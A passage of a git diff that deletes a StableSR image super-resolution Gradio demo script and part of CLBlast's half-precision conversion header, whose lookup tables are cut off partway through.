num_timesteps % len(section_counts) - start_idx = 0 - all_steps = [] - for i, section_count in enumerate(section_counts): - size = size_per + (1 if i < extra else 0) - if size < section_count: - raise ValueError( - f"cannot divide section of {size} steps into {section_count}" - ) - if section_count <= 1: - frac_stride = 1 - else: - frac_stride = (size - 1) / (section_count - 1) - cur_idx = 0.0 - taken_steps = [] - for _ in range(section_count): - taken_steps.append(start_idx + round(cur_idx)) - cur_idx += frac_stride - all_steps += taken_steps - start_idx += size - return set(all_steps) - -def chunk(it, size): - it = iter(it) - return iter(lambda: tuple(islice(it, size)), ()) - -def load_model_from_config(config, ckpt, verbose=False): - print(f"Loading model from {ckpt}") - pl_sd = torch.load(ckpt, map_location="cpu") - if "global_step" in pl_sd: - print(f"Global Step: {pl_sd['global_step']}") - sd = pl_sd["state_dict"] - model = instantiate_from_config(config.model) - m, u = model.load_state_dict(sd, strict=False) - if len(m) > 0 and verbose: - print("missing keys:") - print(m) - if len(u) > 0 and verbose: - print("unexpected keys:") - print(u) - - model.cuda() - model.eval() - return model - -# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') -device = torch.device("cuda") -vqgan_config = OmegaConf.load("StableSR/configs/autoencoder/autoencoder_kl_64x64x4_resi.yaml") -vq_model = load_model_from_config(vqgan_config, './vqgan_cfw_00011.ckpt') -vq_model = vq_model.to(device) - -os.makedirs('output', exist_ok=True) - -def inference(image, upscale, dec_w, seed, model_type, ddpm_steps, colorfix_type): - """Run a single prediction on the model""" - precision_scope = autocast - vq_model.decoder.fusion_w = dec_w - seed_everything(seed) - - if model_type == '512': - config = OmegaConf.load("StableSR/configs/stableSRNew/v2-finetune_text_T_512.yaml") - model = load_model_from_config(config, "./stablesr_000117.ckpt") - min_size = 512 - else: - config = OmegaConf.load("StableSR/configs/stableSRNew/v2-finetune_text_T_768v.yaml") - model = load_model_from_config(config, "./stablesr_768v_000139.ckpt") - min_size = 768 - - model = model.to(device) - model.configs = config - model.register_schedule(given_betas=None, beta_schedule="linear", timesteps=1000, - linear_start=0.00085, linear_end=0.0120, cosine_s=8e-3) - model.num_timesteps = 1000 - - sqrt_alphas_cumprod = copy.deepcopy(model.sqrt_alphas_cumprod) - sqrt_one_minus_alphas_cumprod = copy.deepcopy(model.sqrt_one_minus_alphas_cumprod) - - use_timesteps = set(space_timesteps(1000, [ddpm_steps])) - last_alpha_cumprod = 1.0 - new_betas = [] - timestep_map = [] - for i, alpha_cumprod in enumerate(model.alphas_cumprod): - if i in use_timesteps: - new_betas.append(1 - alpha_cumprod / last_alpha_cumprod) - last_alpha_cumprod = alpha_cumprod - timestep_map.append(i) - new_betas = [beta.data.cpu().numpy() for beta in new_betas] - model.register_schedule(given_betas=np.array(new_betas), timesteps=len(new_betas)) - model.num_timesteps = 1000 - model.ori_timesteps = list(use_timesteps) - model.ori_timesteps.sort() - model = model.to(device) - - try: # global try - with torch.no_grad(): - with precision_scope("cuda"): - with model.ema_scope(): - init_image = load_img(image) - init_image = F.interpolate( - init_image, - size=(int(init_image.size(-2)*upscale), - int(init_image.size(-1)*upscale)), - mode='bicubic', - ) - - if init_image.size(-1) < min_size or init_image.size(-2) < min_size: - ori_size = init_image.size() - rescale = min_size * 1.0 / min(init_image.size(-2), init_image.size(-1)) - new_h = max(int(ori_size[-2]*rescale), min_size) - new_w = max(int(ori_size[-1]*rescale), min_size) - init_template = F.interpolate( - init_image, - size=(new_h, new_w), - mode='bicubic', - ) - else: - init_template = init_image - rescale = 1 - init_template = init_template.clamp(-1, 1) - assert init_template.size(-1) >= min_size - assert init_template.size(-2) >= min_size - - init_template = init_template.type(torch.float16).to(device) - - if init_template.size(-1) <= 1280 or init_template.size(-2) <= 1280: - init_latent_generator, enc_fea_lq = vq_model.encode(init_template) - init_latent = model.get_first_stage_encoding(init_latent_generator) - text_init = ['']*init_template.size(0) - semantic_c = model.cond_stage_model(text_init) - - noise = torch.randn_like(init_latent) - - t = repeat(torch.tensor([999]), '1 -> b', b=init_image.size(0)) - t = t.to(device).long() - x_T = model.q_sample_respace(x_start=init_latent, t=t, sqrt_alphas_cumprod=sqrt_alphas_cumprod, sqrt_one_minus_alphas_cumprod=sqrt_one_minus_alphas_cumprod, noise=noise) - - if init_template.size(-1)<= min_size and init_template.size(-2) <= min_size: - samples, _ = model.sample(cond=semantic_c, struct_cond=init_latent, batch_size=init_template.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True) - else: - samples, _ = model.sample_canvas(cond=semantic_c, struct_cond=init_latent, batch_size=init_template.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True, tile_size=int(min_size/8), tile_overlap=min_size//16, batch_size_sample=init_template.size(0)) - x_samples = vq_model.decode(samples * 1. / model.scale_factor, enc_fea_lq) - if colorfix_type == 'adain': - x_samples = adaptive_instance_normalization(x_samples, init_template) - elif colorfix_type == 'wavelet': - x_samples = wavelet_reconstruction(x_samples, init_template) - x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0) - else: - im_spliter = ImageSpliterTh(init_template, 1280, 1000, sf=1) - for im_lq_pch, index_infos in im_spliter: - init_latent = model.get_first_stage_encoding(model.encode_first_stage(im_lq_pch)) # move to latent space - text_init = ['']*init_latent.size(0) - semantic_c = model.cond_stage_model(text_init) - noise = torch.randn_like(init_latent) - # If you would like to start from the intermediate steps, you can add noise to LR to the specific steps. - t = repeat(torch.tensor([999]), '1 -> b', b=init_template.size(0)) - t = t.to(device).long() - x_T = model.q_sample_respace(x_start=init_latent, t=t, sqrt_alphas_cumprod=sqrt_alphas_cumprod, sqrt_one_minus_alphas_cumprod=sqrt_one_minus_alphas_cumprod, noise=noise) - # x_T = noise - samples, _ = model.sample_canvas(cond=semantic_c, struct_cond=init_latent, batch_size=im_lq_pch.size(0), timesteps=ddpm_steps, time_replace=ddpm_steps, x_T=x_T, return_intermediates=True, tile_size=int(min_size/8), tile_overlap=min_size//16, batch_size_sample=im_lq_pch.size(0)) - _, enc_fea_lq = vq_model.encode(im_lq_pch) - x_samples = vq_model.decode(samples * 1. / model.scale_factor, enc_fea_lq) - if colorfix_type == 'adain': - x_samples = adaptive_instance_normalization(x_samples, im_lq_pch) - elif colorfix_type == 'wavelet': - x_samples = wavelet_reconstruction(x_samples, im_lq_pch) - im_spliter.update(x_samples, index_infos) - x_samples = im_spliter.gather() - x_samples = torch.clamp((x_samples+1.0)/2.0, min=0.0, max=1.0) - - if rescale > 1: - x_samples = F.interpolate( - x_samples, - size=(int(init_image.size(-2)), - int(init_image.size(-1))), - mode='bicubic', - ) - x_samples = x_samples.clamp(0, 1) - x_sample = 255. * rearrange(x_samples[0].cpu().numpy(), 'c h w -> h w c') - restored_img = x_sample.astype(np.uint8) - Image.fromarray(x_sample.astype(np.uint8)).save(f'output/out.png') - - return restored_img, f'output/out.png' - except Exception as error: - print('Global exception', error) - return None, None - - -title = "Exploiting Diffusion Prior for Real-World Image Super-Resolution" -description = r"""
StableSR logo
-Official Gradio demo for Exploiting Diffusion Prior for Real-World Image Super-Resolution.
-🔥 StableSR is a general image super-resolution algorithm for real-world and AIGC images.
-""" -article = r""" -If StableSR is helpful, please help to ⭐ the Github Repo. Thanks! -[![GitHub Stars](https://img.shields.io/github/stars/IceClear/StableSR?style=social)](https://github.com/IceClear/StableSR) - ---- - -📝 **Citation** - -If our work is useful for your research, please consider citing: -```bibtex -@inproceedings{wang2023exploiting, - author = {Wang, Jianyi and Yue, Zongsheng and Zhou, Shangchen and Chan, Kelvin CK and Loy, Chen Change}, - title = {Exploiting Diffusion Prior for Real-World Image Super-Resolution}, - booktitle = {arXiv preprint arXiv:2305.07015}, - year = {2023} -} -``` - -📋 **License** - -This project is licensed under S-Lab License 1.0. -Redistribution and use for non-commercial purposes should follow this license. - -📧 **Contact** - -If you have any questions, please feel free to reach me out at iceclearwjy@gmail.com. - -
- 🤗 Find Me: - Twitter Follow - Github Follow -
- -
visitors
-""" - -demo = gr.Interface( - inference, [ - gr.inputs.Image(type="filepath", label="Input"), - gr.inputs.Number(default=1, label="Rescaling_Factor (Large images require huge time)"), - gr.Slider(0, 1, value=0.5, step=0.01, label='CFW_Fidelity (0 for better quality, 1 for better identity)'), - gr.inputs.Number(default=42, label="Seeds"), - gr.Dropdown( - choices=["512", "768v"], - value="512", - label="Model", - ), - gr.Slider(10, 1000, value=200, step=1, label='Sampling timesteps for DDPM'), - gr.Dropdown( - choices=["none", "adain", "wavelet"], - value="adain", - label="Color_Correction", - ), - ], [ - gr.outputs.Image(type="numpy", label="Output"), - gr.outputs.File(label="Download the output") - ], - title=title, - description=description, - article=article, - examples=[ - ['./01.png', 4, 0.5, 42, "512", 200, "adain"], - ['./02.png', 4, 0.5, 42, "512", 200, "adain"], - ['./03.png', 4, 0.5, 42, "512", 200, "adain"], - ['./04.png', 4, 0.5, 42, "512", 200, "adain"], - ['./05.png', 4, 0.5, 42, "512", 200, "adain"] - ] - ) - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/Illumotion/Koboldcpp/include/clblast_half.h b/spaces/Illumotion/Koboldcpp/include/clblast_half.h deleted file mode 100644 index cbea1723a815cc9ec2045d1b65bec2e8db76193d..0000000000000000000000000000000000000000 --- a/spaces/Illumotion/Koboldcpp/include/clblast_half.h +++ /dev/null @@ -1,249 +0,0 @@ - -// ================================================================================================= -// This file is part of the CLBlast project. The project is licensed under Apache Version 2.0. This -// project loosely follows the Google C++ styleguide and uses a tab-size of two spaces and a max- -// width of 100 characters per line. -// -// Author(s): -// Cedric Nugteren -// -// This file provides simple conversion operations between fp16 (half) and fp32 (float). These -// conversion functions are based on ftp://ftp.fox-toolkit.org/pub/fasthalffloatconversion.pdf and -// are also part of the C++ half-precision header (http://half.sourceforge.net/). -// -// This file is pure C99. -// -// ================================================================================================= - -#ifndef CLBLAST_HALF_H_ -#define CLBLAST_HALF_H_ - -// ================================================================================================= - -// The host data-type for half-precision floating-point (16-bit) is based on the `cl_half` OpenCL -// type, which is a typedef for unsigned short. -typedef unsigned short half; - -// 32-bit union for conversions -typedef union ConversionBits_ { - unsigned int i32; - float f32; -} ConversionBits; - -// ================================================================================================= - -// Converts a IEEE-compliant single-precision value to half-precision floating-point. This function -// applies simple truncation (round toward zero, but with overflows set to infinity) as rounding -// mode. -static half FloatToHalf(const float value) { - static const unsigned short base_table[512] = { - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, - 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0008, 0x0010, 0x0020, 0x0040, 0x0080, 0x0100, - 0x0200, 0x0400, 0x0800, 0x0C00, 0x1000, 0x1400, 0x1800, 0x1C00, 0x2000, 0x2400, 0x2800, 0x2C00, 0x3000, 0x3400, 0x3800, 0x3C00, - 0x4000, 0x4400, 0x4800, 0x4C00, 0x5000, 0x5400, 0x5800, 0x5C00, 0x6000, 0x6400, 0x6800, 0x6C00, 0x7000, 0x7400, 0x7800, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, 0x7C00, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, - 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8000, 0x8001, 0x8002, 0x8004, 0x8008, 0x8010, 0x8020, 0x8040, 0x8080, 0x8100, - 0x8200, 0x8400, 0x8800, 0x8C00, 0x9000, 0x9400, 0x9800, 0x9C00, 0xA000, 0xA400, 0xA800, 0xAC00, 0xB000, 0xB400, 0xB800, 0xBC00, - 0xC000, 0xC400, 0xC800, 0xCC00, 0xD000, 0xD400, 0xD800, 0xDC00, 0xE000, 0xE400, 0xE800, 0xEC00, 0xF000, 0xF400, 0xF800, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, - 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00, 0xFC00 - }; - static const unsigned char shift_table[512] = { - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, - 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 13, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, - 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, - 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 13 - }; - ConversionBits bits; - bits.f32 = value; - const unsigned short halfbits = base_table[bits.i32 >> 23] + - (unsigned short)((bits.i32 & 0x7FFFFF) >> shift_table[bits.i32 >> 23]); - return halfbits; -} - -// Converts a half-precision value to IEEE-compliant single-precision floating-point -static float HalfToFloat(const half value) { - static const unsigned int mantissa_table[2048] = { - 0x00000000, 0x33800000, 0x34000000, 0x34400000, 0x34800000, 0x34A00000, 0x34C00000, 0x34E00000, 0x35000000, 0x35100000, 0x35200000, 0x35300000, 0x35400000, 0x35500000, 0x35600000, 0x35700000, - 0x35800000, 0x35880000, 0x35900000, 0x35980000, 0x35A00000, 0x35A80000, 0x35B00000, 0x35B80000, 0x35C00000, 0x35C80000, 0x35D00000, 0x35D80000, 0x35E00000, 0x35E80000, 0x35F00000, 0x35F80000, - 0x36000000, 0x36040000, 0x36080000, 0x360C0000, 0x36100000, 0x36140000, 0x36180000, 0x361C0000, 0x36200000, 0x36240000, 0x36280000, 0x362C0000, 0x36300000, 0x36340000, 0x36380000, 0x363C0000, - 0x36400000, 0x36440000, 0x36480000, 0x364C0000, 0x36500000, 0x36540000, 0x36580000, 0x365C0000, 0x36600000, 0x36640000, 0x36680000, 0x366C0000, 0x36700000, 0x36740000, 0x36780000, 0x367C0000, - 0x36800000, 0x36820000, 0x36840000, 0x36860000, 0x36880000, 0x368A0000, 0x368C0000, 0x368E0000, 0x36900000, 0x36920000, 0x36940000, 0x36960000, 0x36980000, 0x369A0000, 0x369C0000, 0x369E0000, - 0x36A00000, 0x36A20000, 0x36A40000, 0x36A60000, 0x36A80000, 0x36AA0000, 0x36AC0000, 0x36AE0000, 0x36B00000, 0x36B20000, 0x36B40000, 0x36B60000, 0x36B80000, 0x36BA0000, 0x36BC0000, 0x36BE0000, - 0x36C00000, 0x36C20000, 0x36C40000, 0x36C60000, 0x36C80000, 0x36CA0000, 0x36CC0000, 0x36CE0000, 0x36D00000, 0x36D20000, 0x36D40000, 0x36D60000, 0x36D80000, 0x36DA0000, 0x36DC0000, 0x36DE0000, - 0x36E00000, 0x36E20000, 0x36E40000, 0x36E60000, 0x36E80000, 0x36EA0000, 0x36EC0000, 0x36EE0000, 0x36F00000, 0x36F20000, 0x36F40000, 0x36F60000, 0x36F80000, 0x36FA0000, 0x36FC0000, 0x36FE0000, - 0x37000000, 0x37010000, 0x37020000, 0x37030000, 0x37040000, 0x37050000, 0x37060000, 0x37070000, 0x37080000, 0x37090000, 0x370A0000, 0x370B0000, 0x370C0000, 0x370D0000, 0x370E0000, 0x370F0000, - 0x37100000, 0x37110000, 0x37120000, 0x37130000, 0x37140000, 0x37150000, 0x37160000, 0x37170000, 0x37180000, 0x37190000, 0x371A0000, 0x371B0000, 0x371C0000, 0x371D0000, 0x371E0000, 0x371F0000, - 0x37200000, 0x37210000, 0x37220000, 0x37230000, 0x37240000, 0x37250000, 0x37260000, 0x37270000, 0x37280000, 0x37290000, 0x372A0000, 0x372B0000, 0x372C0000, 0x372D0000, 0x372E0000, 0x372F0000, - 0x37300000, 0x37310000, 0x37320000, 0x37330000, 0x37340000, 0x37350000, 0x37360000, 0x37370000, 0x37380000, 0x37390000, 0x373A0000, 0x373B0000, 0x373C0000, 0x373D0000, 0x373E0000, 0x373F0000, - 0x37400000, 0x37410000, 0x37420000, 0x37430000, 0x37440000, 0x37450000, 0x37460000, 0x37470000, 0x37480000, 0x37490000, 0x374A0000, 0x374B0000, 0x374C0000, 0x374D0000, 0x374E0000, 0x374F0000, - 0x37500000, 0x37510000, 0x37520000, 0x37530000, 0x37540000, 0x37550000, 0x37560000, 0x37570000, 0x37580000, 0x37590000, 0x375A0000, 0x375B0000, 0x375C0000, 0x375D0000, 0x375E0000, 0x375F0000, - 0x37600000, 0x37610000, 0x37620000, 0x37630000, 0x37640000, 0x37650000, 0x37660000, 0x37670000, 0x37680000, 0x37690000, 0x376A0000, 0x376B0000, 0x376C0000, 0x376D0000, 0x376E0000, 0x376F0000, - 0x37700000, 0x37710000, 0x37720000, 0x37730000, 0x37740000, 0x37750000, 0x37760000, 0x37770000, 0x37780000, 0x37790000, 0x377A0000, 0x377B0000, 0x377C0000, 0x377D0000, 0x377E0000, 0x377F0000, - 0x37800000, 0x37808000, 0x37810000, 0x37818000, 0x37820000, 0x37828000, 0x37830000, 0x37838000, 0x37840000, 0x37848000, 0x37850000, 0x37858000, 0x37860000, 0x37868000, 0x37870000, 0x37878000, - 0x37880000, 0x37888000, 0x37890000, 0x37898000, 0x378A0000, 0x378A8000, 0x378B0000, 0x378B8000, 0x378C0000, 0x378C8000, 0x378D0000, 0x378D8000, 0x378E0000, 0x378E8000, 0x378F0000, 0x378F8000, - 0x37900000, 0x37908000, 0x37910000, 0x37918000, 0x37920000, 0x37928000, 0x37930000, 0x37938000, 0x37940000, 0x37948000, 0x37950000, 0x37958000, 0x37960000, 0x37968000, 0x37970000, 0x37978000, - 0x37980000, 0x37988000, 0x37990000, 0x37998000, 0x379A0000, 0x379A8000, 0x379B0000, 0x379B8000, 0x379C0000, 0x379C8000, 0x379D0000, 0x379D8000, 0x379E0000, 0x379E8000, 0x379F0000, 0x379F8000, - 0x37A00000, 0x37A08000, 0x37A10000, 0x37A18000, 0x37A20000, 0x37A28000, 0x37A30000, 0x37A38000, 0x37A40000, 0x37A48000, 0x37A50000, 0x37A58000, 0x37A60000, 0x37A68000, 0x37A70000, 0x37A78000, - 0x37A80000, 0x37A88000, 0x37A90000, 0x37A98000, 0x37AA0000, 0x37AA8000, 0x37AB0000, 0x37AB8000, 0x37AC0000, 0x37AC8000, 0x37AD0000, 0x37AD8000, 0x37AE0000, 0x37AE8000, 0x37AF0000, 0x37AF8000, - 0x37B00000, 0x37B08000, 0x37B10000, 0x37B18000, 0x37B20000, 0x37B28000, 0x37B30000, 0x37B38000, 0x37B40000, 0x37B48000, 0x37B50000, 0x37B58000, 0x37B60000, 0x37B68000, 0x37B70000, 0x37B78000, - 0x37B80000, 0x37B88000, 0x37B90000, 0x37B98000, 0x37BA0000, 0x37BA8000, 0x37BB0000, 0x37BB8000, 0x37BC0000, 0x37BC8000, 0x37BD0000, 0x37BD8000, 0x37BE0000, 0x37BE8000, 0x37BF0000, 0x37BF8000, - 0x37C00000, 0x37C08000, 0x37C10000, 0x37C18000, 0x37C20000, 0x37C28000, 0x37C30000, 0x37C38000, 0x37C40000, 0x37C48000, 0x37C50000, 0x37C58000, 0x37C60000, 0x37C68000, 0x37C70000, 0x37C78000, - 0x37C80000, 0x37C88000, 0x37C90000, 0x37C98000, 0x37CA0000, 0x37CA8000, 0x37CB0000, 0x37CB8000, 0x37CC0000, 0x37CC8000, 0x37CD0000, 0x37CD8000, 0x37CE0000, 0x37CE8000, 0x37CF0000, 0x37CF8000, - 0x37D00000, 0x37D08000, 0x37D10000, 0x37D18000, 0x37D20000, 0x37D28000, 0x37D30000, 0x37D38000, 0x37D40000, 0x37D48000, 0x37D50000, 0x37D58000, 0x37D60000, 0x37D68000, 0x37D70000, 0x37D78000, - 0x37D80000, 0x37D88000, 0x37D90000, 0x37D98000, 0x37DA0000, 0x37DA8000, 0x37DB0000, 0x37DB8000, 0x37DC0000, 0x37DC8000, 0x37DD0000, 0x37DD8000, 0x37DE0000, 0x37DE8000, 0x37DF0000, 0x37DF8000, - 0x37E00000, 0x37E08000, 0x37E10000, 0x37E18000, 0x37E20000, 0x37E28000, 0x37E30000, 0x37E38000, 0x37E40000, 0x37E48000, 0x37E50000, 0x37E58000, 0x37E60000, 0x37E68000, 0x37E70000, 0x37E78000, - 0x37E80000, 0x37E88000, 0x37E90000, 0x37E98000, 0x37EA0000, 0x37EA8000, 0x37EB0000, 0x37EB8000, 0x37EC0000, 0x37EC8000, 0x37ED0000, 0x37ED8000, 0x37EE0000, 0x37EE8000, 0x37EF0000, 0x37EF8000, - 0x37F00000, 0x37F08000, 0x37F10000, 0x37F18000, 0x37F20000, 0x37F28000, 0x37F30000, 0x37F38000, 0x37F40000, 0x37F48000, 0x37F50000, 0x37F58000, 0x37F60000, 0x37F68000, 0x37F70000, 0x37F78000, - 0x37F80000, 0x37F88000, 0x37F90000, 0x37F98000, 0x37FA0000, 0x37FA8000, 0x37FB0000, 0x37FB8000, 0x37FC0000, 0x37FC8000, 0x37FD0000, 0x37FD8000, 0x37FE0000, 0x37FE8000, 0x37FF0000, 0x37FF8000, - 0x38000000, 0x38004000, 0x38008000, 0x3800C000, 0x38010000, 0x38014000, 0x38018000, 0x3801C000, 0x38020000, 0x38024000, 0x38028000, 0x3802C000, 0x38030000, 0x38034000, 0x38038000, 0x3803C000, - 0x38040000, 0x38044000, 0x38048000, 0x3804C000, 0x38050000, 0x38054000, 0x38058000, 0x3805C000, 0x38060000, 0x38064000, 0x38068000, 0x3806C000, 0x38070000, 0x38074000, 0x38078000, 0x3807C000, - 0x38080000, 0x38084000, 0x38088000, 0x3808C000, 0x38090000, 0x38094000, 0x38098000, 0x3809C000, 0x380A0000, 0x380A4000, 0x380A8000, 0x380AC000, 0x380B0000, 0x380B4000, 0x380B8000, 0x380BC000, - 0x380C0000, 0x380C4000, 0x380C8000, 0x380CC000, 0x380D0000, 0x380D4000, 0x380D8000, 0x380DC000, 0x380E0000, 0x380E4000, 0x380E8000, 0x380EC000, 0x380F0000, 0x380F4000, 0x380F8000, 0x380FC000, - 0x38100000, 0x38104000, 0x38108000, 0x3810C000, 0x38110000, 0x38114000, 0x38118000, 0x3811C000, 0x38120000, 0x38124000, 0x38128000, 0x3812C000, 0x38130000, 0x38134000, 0x38138000, 0x3813C000, - 0x38140000, 0x38144000, 0x38148000, 